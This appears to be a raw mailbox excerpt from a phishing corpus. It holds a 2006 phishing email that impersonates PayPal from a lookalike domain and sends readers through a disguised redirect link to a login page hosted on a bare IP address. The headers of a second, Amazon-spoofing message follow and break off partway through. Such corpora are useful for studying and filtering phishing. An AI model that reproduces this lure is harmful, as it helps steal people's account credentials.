From: "service@paypaI.com" <service@paypaI.com>
Subject: New e-mail address added to your account
Date: Tue, 21 Mar 2006 16:26:40 +0200
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Message-Id: <20060321142534.B83196FA363@mail2.example.com>
To: undisclosed-recipients: ;
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 664

</head>
<body>
<div align="left" class="style2">
  <p class="style2"><font face="Verdana" size="2">P a y P a I - Notification</font></p>
	<p class="style2"><FONT face="Verdana" size="2">You have added <b>cutter1@msn.com</b> as a new e-mail address for your
	account.<br>
    If you don't agree with this e-mail and if you need assistance with your account,<br>
  	<b>
  	<a target="_blank" href="http://www.google.com/url?sa=U&start=4&q=http://220.181.9.249/.www.paypal.com/bin-cgi/webscr_cmd=_login-run/">click here</a></b> and process your login.</font></p>
    </p>
  <p><font face="Verdana" size="2">Please do 
	not reply to this e-mail.</font></p>
  <p><font face="Verdana" size="2">E-Mail ID: PP998787</font></p>
</div>
</body>
</html>

From service@amazon.com  Tue Mar 21 19:00:40 2006
Return-Path: <service@amazon.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.1.2.3])
	by naughty.example.com (Postfix) with ESMTP id CE9B1536E21
	for <nobody@login.example.com>; Tue, 21 Mar 2006 19:00:40 -0500 (EST)
Received: from 10.1.10.200 (unknown [70.90.2.205])
	by mail1.example.com (Postfix) with SMTP id 5F5736CCECC
	for <nobody@example.com>; Tue, 21 Mar 2006 19:00:40 -0500 (EST)
Received: from 240.216.37.131 by ; Wed, 22 Mar 2006 02:59:06 +0300
Message-ID: <V[20
Date: Tue, 21 Mar 2006 19:00:40 -0500 (EST)
